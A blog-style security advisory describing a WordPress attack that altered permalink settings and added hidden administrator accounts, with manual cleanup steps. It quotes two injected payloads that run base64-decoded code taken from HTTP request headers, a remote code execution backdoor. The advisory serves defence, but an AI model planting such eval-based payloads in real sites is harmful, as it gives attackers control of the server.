Daily Archives: 2017-11-12

WordPress SQL Injection – Latest Attack

A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts URLs will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.

There was one of the following codes that were added to your permalink structure due to this attack:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

These quotes appended all permalinks on your site and it can only be changed if removed manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.

We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.

Also if you haven’t implement some of these measures to secure your WordPress Admin Area.